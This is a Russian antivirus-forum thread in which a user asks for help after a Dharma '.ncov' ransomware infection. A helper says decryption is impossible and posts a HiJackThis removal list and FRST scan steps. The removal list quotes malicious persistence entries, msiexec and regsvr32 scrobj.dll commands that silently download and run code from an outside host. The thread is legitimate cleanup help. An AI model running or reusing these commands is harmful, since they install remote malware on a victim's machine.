Перейти к содержанию

Шифровальщик .[bitcoin@email.tg].ncov

kosbob
 Поделиться

Рекомендуемые сообщения

kosbob

kosbob

Опубликовано
Опубликовано

Добрый день!

Поймал шифровальщик NCOV. Есть ли возможность восстановить данные?

Делал, как написано здесь: https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

Проверку делал в безопасном режиме Windows. Проверял пока один жесткий с системой, второй диск отключил.

На рабочем столе осталась папка pld. С нее, видимо, все и запускалось.

 

CollectionLog-2020.03.30-19.47.zip

SQ

SQ

Опубликовано
Опубликовано

Здравствуйте,

Похоже, что шифровальщик из семейства Dharma, к сожалению расшифровки нет.

P.S. На данный момент единственный способ восстановление данных, это только если у вас есть резервные копии.

 

Удалите остатки от антивируса Avast утилитой Avast Remover.

1) HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

F2 - HKLM\..\WinLogon: [Shell] =
O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
O2-32 - HKLM\..\BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - (no file)
O4 - (disabled) HKLM\..\Run-: [start1] = C:\Windows\system32\msiexec.exe /i http://js.1226bye.xyz:280/helloworld.msi /q
O4 - (disabled) HKLM\..\Run-: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
O4 - Global User Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
O7 - TroubleShooting: (EV) HKCU\..\Environment: [TEMP] = (not exist)
O7 - TroubleShooting: (EV) HKCU\..\Environment: [TMP] = (not exist)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)

2)  Скачайте Farbar Recovery Scan Tool  FRST_Icon.png и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".
    FRST.png
  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Sandynist
      Коронавирус из Китая 2019-nCoV
      Автор Sandynist
      Добрый день!
       
      Новости из Китая всё мрачнее и мрачнее. Уже 10 китайских городов закрыто на карантин. Вирус стремительно распространяется не только в Китае, но и по всей планете — подтверждённые случаи имеются уже в 12 странах мира.
       
      Прогнозируется максимум распространения инфекции на февраль месяц. 
       
      Сегодня сходил в аптеку и купил маски. Пока ещё есть в продаже. Вчера был в местном супермаркете — все продавцы сидят в масках, правда некоторые халтурят, маски закрывают только рот, что конечно же не оберегает от вдыхания потенциально опасных кубометров воздуха.
       
      А как у вас проходит подготовка к эпидемии?
       
      Вспышка коронавируса в Китае::
       
       
      У нас некоторые туристы пытаются сдать путёвки в Китай, но судя по принятому ранее закону, никаких компенсаций от турфирм выплачено не будет.
       
      Но хуже то, что в Ухане, центре эпидемии, сейчас находится почти сотня студентов из РК, а выезд из города блокирован военными.
    • KL FC Bot
      Кража крипты из кошельков Exodus и Bitcoin через взломанные приложения macOS | Блог Касперского
      Автор KL FC Bot
      Распространение зловредов вместе со взломанными играми или приложениями — один из старейших трюков киберпреступников. Удивительно, но даже в 2024 году находятся доверчивые жертвы, верящие в Робин Гудов и предполагающие, что скачивать взломанные платные программы и игры с пиратских сайтов совершенно безопасно. Однако, хотя эта угроза и стара, злоумышленники постоянно изобретают новые приемы для доставки вредоносного ПО на компьютер жертвы в попытке обойти защитные решения.
      Недавно мы обнаружили новую кампанию такого рода, нацеленную на компьютеры Apple со свежими версиями macOS (13.6 и выше) и использующую особенности устройства сервиса доменных имен (DNS) для скачивания вредоносной нагрузки. Жертвам предлагается бесплатно скачать взломанные версии популярных приложений. Что ждет тех, кто поддастся искушению?
      Фальшивая активация
      После скачивания образа диска, предположительно содержащего взломанную программу, жертве предлагается скопировать в папку Applications два файла: само приложение и программу-«активатор». Если скопировать и запустить только приложение, оно не заработает. Инструкция гласит, что взломанную программу обязательно надо «активировать». Как выяснилось при анализе, функция активатора примитивна — он убирает в исполняемом файле приложения несколько начальных байтов, после чего оно начинает работать. То есть преступники взяли уже взломанное приложение и изменили его так, чтобы без активатора оно не могло запуститься. Разумеется, активатор имеет неприятную дополнительную функцию — при запуске он запрашивает права администратора и, пользуясь ими, устанавливает в системе скрипт-загрузчик. Этот скрипт скачивает из Сети дополнительную вредоносную нагрузку — бэкдор, регулярно запрашивающий команды от злоумышленников.
      Инструкция по установке, окно активатора и запрос пароля администратора
       
      Посмотреть статью полностью
    • Ser25
      Шифровальщик
      Автор Ser25
      Взломали пароль и зашифровали удаленный комп. Пока ничего не предпринимал
      20250507.7z
    • Пользователь 1551
      Шифровальщик
      Автор Пользователь 1551
      Добрый день! У нас аналогичная ситуация? Удалось расшифровать?
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
    • Thunderer
      Шифровальщик
      Автор Thunderer
      Зашифровали файлы на компьютере и все общие папки 
      Подключились к компьютеру по RDP 
      В архиве логи frst, зашифрованный и расшифрованный файлы
      -Файлы.zip
×
×
  • Создать...